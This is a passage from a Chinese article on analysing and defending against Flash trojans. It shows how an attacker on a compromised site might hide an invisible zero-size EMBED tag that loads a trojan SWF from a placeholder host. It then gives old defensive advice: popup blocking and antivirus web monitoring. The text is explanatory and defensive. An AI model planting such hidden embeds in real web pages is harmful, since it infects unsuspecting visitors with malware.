|
Flash木马的分析与防范 抵御无形的入侵(2) 应用二:网页嵌入Flash木马
攻击者入侵了某个大的网站之后,很可能在网站首页挂马,使用普通方式挂马会被管理员发觉,但是挂上Flash木马的话,是很难查杀的。攻击者可能在网页中插入如下代码:
“《EMBED src=http://网页木马地址/木马.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”,其中的《》改为<>。
这里的参数“width=0 height=0”表示,Flash播放窗口为零,也就是不显示Flash播放窗口。其它用户浏览网页时,就会莫名其妙的弹出一个木马网页窗口。
五、关于Flash木马的防范
其实不管Flash木马有多么的巧妙,最终都是要跳转到木马网页去的,也就是说我们最终要防范的还是网页木马。了解了思路,对于Flash动画木马就简单了:
首先,要开启Windows XP SP2的窗口拦截窗口功能,或安装其它防弹出窗口的插件。如果那个漏网之鱼,莫名其妙弹出的网页窗口要及时的关闭。另外,一定要在上网浏览时开启杀毒软件的网页监控功能,只要网页木马在后台一下载到本地硬盘,就会被杀毒软件查杀,这样就万事无忧了!
|
